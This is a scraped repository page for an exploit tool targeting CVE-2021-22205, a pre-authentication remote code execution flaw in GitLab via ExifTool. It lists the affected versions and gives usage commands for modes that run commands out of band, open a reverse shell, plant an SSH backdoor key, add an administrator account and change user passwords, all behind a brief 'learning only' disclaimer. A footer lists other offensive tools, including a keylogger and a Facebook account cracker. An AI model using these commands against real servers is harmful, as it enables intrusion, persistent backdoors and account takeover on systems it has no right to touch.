GitLab CE/EE Preauth RCE using ExifTool

Related tags

Security related resourcesgitlabpentest-scriptscve-2021-22205preauth-rce
Overview

CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities

Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affect Versions:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

Features

  • Gitlab version detection through the hash in Webpack manifest.json

  • Automatical out-of-band interactions with DNSLog & PostBin

  • Support Reverse Bash Shell / Append SSH Key to authorized_keys

  • Support ENTER to modify and restore gitlab user password

Usage

๐Ÿš โ€บโ€บโ€บ python CVE-2021-22205.py

      โ–‘โ–‘โ–‘โ–‘โ–โ–โ–‘โ–‘โ–‘  CVE-2021-22205
 โ–  โ–‘โ–‘โ–‘โ–‘โ–‘โ–„โ–ˆโ–ˆโ–„โ–„  GitLab CE/EE Unauthenticated RCE using ExifTool
  โ–€โ–€โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–€โ–‘โ–‘  Affecting all versions starting from 11.9
  โ–‘โ–‘โ–โ–โ–‘โ–‘โ–โ–โ–‘โ–‘  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 โ–’โ–’โ–’โ–โ–โ–’โ–’โ–โ–โ–’  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # ็‰ˆๆœฌ & ๆผๆดžๆŽขๆต‹
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # ๅ‘ฝไปคๆ‰ง่กŒ OOB ๅ›žๆ˜พ
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # ๅ‘ฝไปคๆ‰ง่กŒๅ†™ๆ–‡ไปถๅ›žๆ˜พ
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # ๅๅผน SHELL
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # SSH ๅŽ้—จๆคๅ…ฅ
    python3 CVE-2021-22205.py -u site_url -m add user pass # ๆทปๅŠ ็ฎก็†็”จๆˆท
    python3 CVE-2021-22205.py -u site_url -m mod user      # ไฟฎๆ”น user ๅฏ†็  => [email protected]
    python3 CVE-2021-22205.py -u site_url -m rec user      # ่ฟ˜ๅŽŸ user ๅฏ†็ 

Screenshot

Detect:

image-20211111130659726

RCE(Echo via PostBin OOB):

image-20211111132623307

Reverse Bash Shell:

image-20211111131442470

Append SSH Key to authorized_keys:

image-20211111133555010

Gitlab user password modification and restoration:

image-20211111132115090

Reference

Owner
3ND
3ND
GitHub Repository
Web Headers Security Scanner

Web Headers Security Scanner

Emre Koybasi 3 Dec 16, 2022
A GitHub action for organizations that enables advanced security code scanning on all new repos

Advanced-Security-Enforcer What this repository does This code is for an active GitHub Action written in Python to check (on a schedule) for new repos

Zack Koppert 30 May 17, 2022
This tool allows to automatically test for Content Security Policy bypass payloads.

CSPass This tool allows to automatically test for Content Security Policy bypass payloads. Usage [cspass]$ ./cspass.py -h usage: cspass.py [-h] [--no-

Ruulian 30 Nov 22, 2022
Automated tool to exploit basic buffer overflow remotely and locally & x32 and x64

Automated tool to exploit basic buffer overflow (remotely or locally) & (x32 or x64)

5 Oct 09, 2022
Tool to check if your DNS comply to Polish Ministry of Finance gambling domains restrictions

dns-mf-hazard Tool to check if your DNS comply to Polish Ministry of Finance gambling domains restrictions How to use it? Installation You need python

Marek Wajdzik 2 Jan 01, 2022
Security system to prevent Shoulder Surfing Attacks

Surf_Sec Security system to prevent Shoulder Surfing Attacks. REQUIREMENTS: Python 3.6+ XAMPP INSTALLED METHOD TO CONFIGURE PROJECT: Clone the repo to

Aman Anand 1 Jan 27, 2022
An experimental script to perform bulk parsing of arbitrary file features with YARA and console logging.

RonnieColemanYARAParser This script is named after Ronnie Coleman, and peforms bulk lifts on arbitary file features using YARA console logging. Requir

Steve 20 Dec 13, 2022
Community Repository for Unofficial Saltbox Add-ons

Saltbox Sandbox Repo Community Repository for Unofficial Saltbox Add-ons Requirements Saltbox Documentation Undetermined Roles List of roles can be fo

Salty Organization 31 Dec 19, 2022
Multi-Process Vulnerability Tool

Multi-Process Vulnerability Tool

Baris Dincer 1 Dec 22, 2021
USSR-Scanner - USSR Scanner with python

Purposes ? Hey there is abosolutely no need to do this we do it only to irritate

Binary.club 2 Jan 24, 2022
Brute-Force-Connected

Brute-Force-Connected Guess the password for Connected accounts the use : Create a new file and put usernames and passwords in it Example : joker:1234

4 Jun 05, 2022
A python base script from which you can hack or clone any person's facebook friendlist or followers accounts which have simple password

Hcoder This is a python base script from which you can hack or clone any person's facebook friendlist or followers accounts which have simple password

Muhammad Hamza 3 Dec 06, 2021
Keystroke logging, often referred to as keylogging or keyboard capturing

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording the keys struck on a keyboard, typically covertly, so that a person using the keyboard is unaware

Harsha G 2 Jan 11, 2022
Windows Server 2016, 2019, 2022 Extracter & Recovery

Parsing files from Deduplicated volumes. It can also recover deleted files from NTFS Filesystem that were deduplicated. Installation git clone https:/

0 Aug 28, 2022
A simple password generator using Python Tkinter.

Password-Generator-using-Python A simple password generator that generates password for you. User can Copy the password to Clipboard. Project made usi

Prashant Agheda 1 Nov 02, 2022
A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell

log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description This demo Tomcat 8 server has a vulnerable app deployed on it and is also vulne

60 Dec 10, 2022
Bandit is a tool designed to find common security issues in Python code.

A security linter from PyCQA Free software: Apache license Documentation: https://bandit.readthedocs.io/en/latest/ Source: https://github.com/PyCQA/ba

Python Code Quality Authority 4.8k Dec 31, 2022
Python APK Reverser & Patcher Tool

DTL-X An Advanced Python APK Reverser and Patcher Tool. --rmads1: target=AndroidManifest.xml,replace=com.google.android.gms.ad --rmads2: No Internet (

DedSecTL 10 Oct 31, 2022
Provides script to download and format public IP lists related to the Log4j exploit.

Provides script to download and format public IP lists related to the Log4j exploit. Current format includes: plain list, Cisco ASA Network Group.

Gianluca Ulivi 1 Jan 02, 2022
Metasploit Multi Purpose Exploiting Toolkit For Termux

MSF-EXPLOIT MSF-ANDRO is a Metasploit Multi Purpose Exploiting Toolkit For Termux . Only a Basic Script , Still in Development . FEATURES : Install Me

Mr.X 22 Dec 29, 2022